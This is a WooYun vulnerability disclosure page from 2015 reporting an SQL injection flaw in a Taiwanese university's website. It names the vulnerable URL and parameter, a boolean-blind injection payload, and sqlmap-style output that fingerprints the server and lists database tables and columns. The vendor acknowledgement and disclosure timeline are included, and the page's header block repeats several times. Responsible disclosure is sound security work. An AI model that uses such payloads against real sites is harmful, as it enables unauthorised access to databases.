中華科技大學SQL注射 | wooyun-2015-0107344| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0107344

漏洞标题：中華科技大學SQL注射

漏洞作者： Ztz

提交时间：2015-04-14 12:17

修复时间：2015-06-02 00:34

公开时间：2015-06-02 00:34

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-14：细节已通知厂商并且等待厂商处理中
2015-04-18：厂商已经确认，细节仅向厂商公开
2015-04-28：细节向核心白帽子及相关领域专家公开
2015-05-08：细节向普通白帽子公开
2015-05-18：细节向实习白帽子公开
2015-06-02：细节向公众公开

简要描述：

中華科技大學SQL注射

详细说明：

中華科技大學:全<del>國</del>臺唯一民航局認證 - 飛機維修人員訓練學校~
注入點
http://www.cust.edu.tw/www/post/ezshow3.php?id=6090

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3136 AND 9587=9587
    Vector: AND [INFERENCE]
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0

back-end DBMS: MySQL 5
Database: cas
[30 tables]
+----------------------------------+
| accesos                          |
| arquivos                         |
| arquivos_campos_palabras         |
| bloqueo_ip                       |
| campos                           |
| configuracions                   |
| configuracions_datos             |
| directorios                      |
| grupos                           |
| palabras                         |
| pfn_accesos                      |
| pfn_arquivos                     |
| pfn_arquivos_campos_palabras     |
| pfn_bloqueo_ip                   |
| pfn_campos                       |
| pfn_configuracions               |
| pfn_configuracions_datos         |
| pfn_directorios                  |
| pfn_grupos                       |
| pfn_palabras                     |
| pfn_raices                       |
| pfn_raices_grupos_configuracions |
| pfn_raices_usuarios              |
| pfn_sesions                      |
| pfn_usuarios                     |
| raices                           |
| raices_grupos_configuracions     |
| raices_usuarios                  |
| sesions                          |
| usuarios                         |
+----------------------------------+

Database: cas
Table: accesos
[8 columns]
+---------+---------------------+
| Column  | Type                |
+---------+---------------------+
| session | varchar(100)        |
| data    | int(10) unsigned    |
| donde   | varchar(50)         |
| estado  | tinyint(1) unsigned |
| id      | int(10) unsigned    |
| ip      | varchar(15)         |
| login   | varchar(50)         |
| ultimo  | int(10) unsigned    |
+---------+---------------------+

漏洞证明：

同上

修复方案：

過濾

版权声明：转载请注明来源 Ztz@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-04-18 00:33

厂商回复：

感謝通報

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0107344

漏洞标题：中華科技大學SQL注射

相关厂商：中華科技大學

漏洞作者： Ztz

提交时间：2015-04-14 12:17

修复时间：2015-06-02 00:34

公开时间：2015-06-02 00:34

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Ztz@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0107344

漏洞标题：中華科技大學SQL注射

相关厂商：中華科技大學

漏洞作者： Ztz

提交时间：2015-04-14 12:17

修复时间：2015-06-02 00:34

公开时间：2015-06-02 00:34

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0107344"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Ztz@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：